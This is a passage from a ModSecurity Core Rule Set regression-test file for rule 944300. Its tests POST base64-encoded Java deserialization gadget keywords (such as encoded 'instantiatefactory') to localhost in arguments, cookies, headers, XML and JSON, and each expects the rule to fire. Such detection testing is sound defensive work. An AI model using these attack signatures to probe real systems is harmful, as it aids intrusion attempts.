"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "BjbG9uZXRyYW5zZm9ybWVy=test" output: log_contains: "id \"944300\"" - test_title: 944300-90 desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=BjbG9uZXRyYW5zZm9ybWVy method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-91 desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: BjbG9uZXRyYW5zZm9ybWVy=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-92 desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: BjbG9uZXRyYW5zZm9ybWVy method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-93 desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-94 desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BjbG9uZXRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-95 desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BjbG9uZXRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-96 desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=BjbG9uZXRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-97 desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" output: log_contains: "id \"944300\"" - test_title: 944300-98 desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-99 desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Zm9yY2xvc3VyZQ" output: log_contains: "id \"944300\"" - test_title: 944300-100 desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Zm9yY2xvc3VyZQ=test" output: log_contains: "id \"944300\"" - test_title: 944300-101 desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Zm9yY2xvc3VyZQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-102 desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Zm9yY2xvc3VyZQ=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-103 desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Zm9yY2xvc3VyZQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-104 desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-105 desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Zm9yY2xvc3VyZQ" output: log_contains: "id \"944300\"" - test_title: 944300-106 desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Zm9yY2xvc3VyZQ" output: log_contains: "id \"944300\"" - test_title: 944300-107 desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Zm9yY2xvc3VyZQ" output: log_contains: "id \"944300\"" - test_title: 944300-108 desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" output: log_contains: "id \"944300\"" - test_title: 944300-109 desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-110 desc: "Argument test includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=GZvcmNsb3N1cmU" output: log_contains: "id \"944300\"" - test_title: 944300-111 desc: "Argument name includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "GZvcmNsb3N1cmU=test" output: log_contains: "id \"944300\"" - test_title: 944300-112 desc: "Cookie test includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=GZvcmNsb3N1cmU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-113 desc: "Cookie name includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: GZvcmNsb3N1cmU=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-114 desc: "Request header test includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: GZvcmNsb3N1cmU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-115 desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-116 desc: "XML element value includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "GZvcmNsb3N1cmU" output: log_contains: "id \"944300\"" - test_title: 944300-117 desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "GZvcmNsb3N1cmU" output: log_contains: "id \"944300\"" - test_title: 944300-118 desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=GZvcmNsb3N1cmU" output: log_contains: "id \"944300\"" - test_title: 944300-119 desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"GZvcmNsb3N1cmU\"}" output: log_contains: "id \"944300\"" - test_title: 944300-120 desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"GZvcmNsb3N1cmU\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-121 desc: "Argument test includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Bmb3JjbG9zdXJl" output: log_contains: "id \"944300\"" - test_title: 944300-122 desc: "Argument name includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Bmb3JjbG9zdXJl=test" output: log_contains: "id \"944300\"" - test_title: 944300-123 desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Bmb3JjbG9zdXJl method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-124 desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Bmb3JjbG9zdXJl=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-125 desc: "Request header test includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Bmb3JjbG9zdXJl method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-126 desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-127 desc: "XML element value includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bmb3JjbG9zdXJl" output: log_contains: "id \"944300\"" - test_title: 944300-128 desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bmb3JjbG9zdXJl" output: log_contains: "id \"944300\"" - test_title: 944300-129 desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Bmb3JjbG9zdXJl" output: log_contains: "id \"944300\"" - test_title: 944300-130 desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" output: log_contains: "id \"944300\"" - test_title: 944300-131 desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-132 desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-133 desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "aW5zdGFudGlhdGVmYWN0b3J5=test" output: log_contains: "id \"944300\"" - test_title: 944300-134 desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-135 desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-136 desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 